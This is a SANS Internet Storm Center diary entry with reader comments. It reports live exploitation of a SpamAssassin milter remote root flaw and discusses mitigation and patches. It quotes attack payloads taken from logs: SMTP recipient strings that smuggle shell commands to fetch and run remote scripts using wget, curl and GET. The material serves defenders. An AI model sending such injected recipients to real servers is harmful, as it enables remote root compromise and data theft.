Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: Spamassassin Milter Plugin Remote Root Attack - SANS Internet Storm Center SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms: https://isctv.sans.edu

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Spamassassin Milter Plugin Remote Root Attack

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
       table; from=<blue@attacker.com> to=<root+:|wget
       hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 -- this host appears to be unreachable at the moment though.

Cheers,
Adrien de Beaupré
EWA-Canada.com

 

I will be teaching next: Intrusion Detection In-Depth - SANS Cyber Defence Australia 2022

 Adrien de Beaupre

353 Posts
ISC Handler
Mar 15th 2010
Thread locked Subscribe Mar 15th 2010
1 decade ago
On FreeBSD, a fix hasn't yet made it into ports. Is there any mitigation against this attack aside from disabling spamass-milter for the time being?
 parseword

9 Posts
Quote Mar 15th 2010
1 decade ago
I'm using spamass-milter on CentOS 5.x (a.k.a. Red Hat Enterprise Linux). Fortunately, the RPM as distributed by Red Hat doesn't use the "-x" flag. *whew* Just check your /etc/sysconfig/spamass-milter EXTRA_FLAGS to see if you added it yourself.

To double-check I attempted the exploit described at the Full Disclosure link (above) and it didn't work.
 parseword
3 Posts
Quote Mar 16th 2010
1 decade ago
I havve logged attempts to use curl as well.

rcpt to: root+:"|wget http://213.186.44.xxx/blue.php"

rcpt to: root+:"|wget http://61.100.185.xxx/busy-1.php"
rcpt to: root+:"|GET http://61.100.185.xxx/busy-2.php"
rcpt to: root+:"|curl http://61.100.185.xxx/busy-3.php"
 Travis

5 Posts
Quote Mar 16th 2010
1 decade ago
@BillBixby: The preliminary patch linked to in the article applies nicely within the port. Just copy it to ${PORTSDIR}/mail/spamass-milter/files/patch-popen and force a rebuild and reinstall of spamass-milter. Tested here on a couple of MTAs (8R-p2 base Sendmail).
 Matt

7 Posts
Quote Mar 18th 2010
1 decade ago

Sign Up for Free or Log In to start participating in the conversation!